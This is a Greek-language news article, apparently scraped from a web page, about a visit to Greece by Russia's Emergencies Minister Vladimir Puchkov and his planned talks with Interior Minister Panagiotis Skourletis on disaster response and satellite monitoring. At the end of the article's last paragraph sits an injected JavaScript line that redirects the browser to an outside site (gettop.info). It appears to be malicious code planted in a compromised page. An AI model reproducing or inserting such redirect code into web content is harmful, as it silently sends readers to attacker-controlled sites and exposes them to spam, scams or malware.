Στην Ελλάδα ο Ρώσος υπουργός Εκτάκτων Αναγκών

0
24

 

Από σήμερα επισκέπτεται την Ελλάδα ο Ρώσος υπουργός Εκτάκτων Αναγκών Βλαντίμιρ Πουτσκόφ ο οποίος θα έχεις συζητήσεις για θέματα διμερούς συνεργασίας στον τομέα της πρόληψης και αντιμετώπισης καταστάσεων εκτάκτων αναγκών.

Στην ατζέντα των θεμάτων συμπεριλαμβάνονται και θέματα εντοπισμού —μέσω δορυφόρων (space monitoring)- περιοχών όπου σημειώνονται παρόμοιες καταστάσεις εκτάκτων αναγκών, σύμφωνα με όσα αναφέρονται σε ανακοίνωση.

Σύμφωνα με την ανακοίνωση του ρωσικού υπουργείου, ο κ. Πουτσκόφ θα συναντηθεί με τον Έλληνα υπουργό Εσωτερικών Παναγιώτη Σκουρλέτη. Στη συνάντηση των δύο ανδρών — υπογραμμίζεται στην ίδια ανακοίνωση- θα τεθούν θέματα που αφορούν την προώθηση της ρώσο-ελληνικής συνεργασίας στον τομέα της προειδοποίησης και αντιμετώπισης φυσικών καταστροφών και άλλων καταστάσεων εκτάκτου ανάγκης.

Εξάλλου, «κατά τη διάρκεια της συνάντησης θα συζητηθούν θέματα συνεργασίας στον τομέα εντοπισμού μέσω δορυφόρων (space monitoring) περιοχών όπου σημειώνονται παρόμοιες καταστάσεις εκτάκτων αναγκών, συνεργασίας στον τομέα ανταλλαγής πληροφοριών μεταξύ των αρμοδίων διοικήσεων του Υπουργείου Εκτάκτων Αναγκών της Ρωσίας και του Ελληνικού Υπουργείου Εσωτερικών, σε καταστάσεις εκτάκτων αναγκών και στην αντιμετώπισή τους» διευκρίνισε πηγή του ρωσικού υπουργείου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here